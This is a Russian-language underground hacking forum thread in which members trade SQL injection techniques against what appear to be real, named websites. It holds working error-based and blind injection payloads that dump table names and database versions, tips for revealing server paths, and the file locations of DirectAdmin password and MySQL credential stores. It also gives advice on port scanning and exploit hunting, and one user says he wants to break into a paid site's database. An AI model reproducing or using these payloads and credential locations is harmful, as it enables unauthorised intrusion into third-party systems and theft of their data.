http://model-talent.net/portfolios/browse.php?age_end=43+and+1=1&age_start=10&page=4&page=24&gallery_view=0

http://film-online.su/engine/data/emoticons/facepalm.gif там скулище ))) выделил

f1ng3r said:

Code:
http://model-talent.net/portfolios/browse.php?age_end=43+and+1=1&age_start=10&page=4&page=24&gallery_view=0

http://film-online.su/engine/data/emoticons/facepalm.gif
там скулище ))) выделил


а сейчас попробуй and 1=0

уже второй раз предупреждаю, транслитом не писать!

http://www.hayesbklaw.com/index.php?id=1'+and+substring(version(),1,1)='5

или

http://www.hayesbklaw.com/index.php?id=1'%20or%20(select%20count(*)%20from%2 0(select%201%20union%20select%202%20union%20select %203)x%20group%20by%20concat((select+table_name+fr om+information_schema.tables+limit+1),floor(rand(0 )*2)))--+

Какие методы вывода путя до корня из sqli

п.с искат по всем страницам было не охотт(((

кроме []

tracy said:
Какие методы вывода путя до корня из sqli
п.с искат по всем страницам было не охотт(((
кроме []


Пробуйте через идентификатор сесии и не парьтесь(но не факт что она стартует!), а так провоцируйте ресурс к "неожиданным(недокументиро� �аным) ситуациям", любым, которые и выплюнут(возможно) ошибку.

Если sqli сопровождаетцо инклудом(читалкой ...) можно запросить несуществующий файл и если ошибки не подавлены, то будет ошибка. При не верном запросе, также можно еще попытатцо логи прочитайть если есть привилегии у пользователя mysql(если речь о mysql иньекциях load_file!), например лог с ошибками(запросить перед етим несущетсвующий файл), ну понятно что надо искать лог.

одним словом варианты есть (чем > практики тем больше фантазии! ).

гугл в помочь еще.

зы не надо привязыватцо для раскрытия к sqli только.

подскажите где директ админ пароли пользователей хранит? в шадов?

искать где-то тут надо наверно: /usr/local/directadmin/

тут пароль от мускуля /usr/local/directadmin/conf/mysql.conf

http://newsmarked.info/userrss.php?user=hiioarvey&status=1'

не могу раскрутить

daniel_1024спасибо! разобрался

пароли храняца в /home/admin/.shadow

Привет всем. Что можно сделать с этим?


Code:
warning: file_get_contents(http://site.ru/client/instructions.php?pid=dsadas%00) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in /home/betteam/public_html/includes/common.inc(1695) : eval()'d code on line 7.

just_panic said:
Привет всем. Что можно сделать с этим?

Code:
warning: file_get_contents(http://site.ru/client/instructions.php?pid=dsadas%00) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in /home/betteam/public_html/includes/common.inc(1695) : eval()'d code on line 7.



Это читалка, ничего с этим не сделаешь..

очень заинтересован базой одной сайты (инфа плтная).

адрес допустим такой:

http://site.aa.su/

если переходить по разделам, то адрес меняеться так: http://site.aa.su/раздел/

т.е. никаких файлов нету, чтоб мне понять что к чему.

сайт самописный.

Как узнать что за БД ?? и возможноси проникновения ?

B1t.exe said:
очень заинтересован базой одной сайты (инфа плтная).
адрес допустим такой:
http://site.aa.su/
если переходить по разделам, то адрес меняеться так: http://site.aa.su/раздел/
т.е. никаких файлов нету, чтоб мне понять что к чему.
сайт самописный.
Как узнать что за БД ?? и возможноси проникновения ?


Пробуй фаззинг, либо сам подбирай верный запрос, опираясь на логику скрипта.

Если совсем глухо и не получается сломать из веба, сканируй открытые порты, смотри, что на них висит, коннекться к ним телнетом, чтобы узнать версии демонов и ищи под них эксплойты.

То, что ты описал, называется Mod_Rewrite.

есть запрос


Code:
+and+(select+1+from+(select+count(0),concat((selec t+table_name+from+information_schema.tables+limit+ 206,1),floor(rand(0)*2))+from+information_schema.t ables+group+by+2)a)--+

как видим, в базе более двухсот таблиц. пребирать лимит руками не кошерно.

есть ли возможность вывести весь список таблиц в блайнд-скуле?

BrainDeaD said:
есть запрос

Code:
+and+(select+1+from+(select+count(0),concat((selec t+table_name+from+information_schema.tables+limit+ 206,1),floor(rand(0)*2))+from+information_schema.t ables+group+by+2)a)--+

как видим, в базе более двухсот таблиц. пребирать лимит руками не кошерно.
есть ли возможность вывести весь список таблиц в блайнд-скуле?


юзай havij, лимитом перебирает все, а так груп конкат не юзать все равно )

Пробуй фаззинг, либо сам подбирай верный запрос, опираясь на логику скрипта.


Не знаю чем и как делать (


сканируй открытые порты, смотри, что на них висит


никак не получаеться. я думаю специально сделали на домене 3_го уровня, чтоб невозможно было даже IP адрес ловить. встроенные утилиты wind ничего не могут определить(ping, nslookup, tracert), т.е. IP адрес.

А вот XSpider тоже молчит ****:


Сканирование хоста не производилось, так как невозможно получить IP-адрес по заданному имени хоста.

Konqi said:
юзай havij, лимитом перебирает все, а так груп конкат не юзать все равно )


ок. попробую.

а что на счёт бенчмарка с переменными? типа


Code:
concat(@i:=0x00,@o:=0x0d0a,benchmark(123,@o:=CONCA T(@o,0x0d0a,(SELECT+concat+(table_schema,0x2E,@i:= table_name)+FROM+information_schema.tables+WHERE+t able_name>@i+order+by table_name+LIMIT+1))),@o)

никак нельзя в блайнд так засунуть, чтоб он всё в ошибке выводил?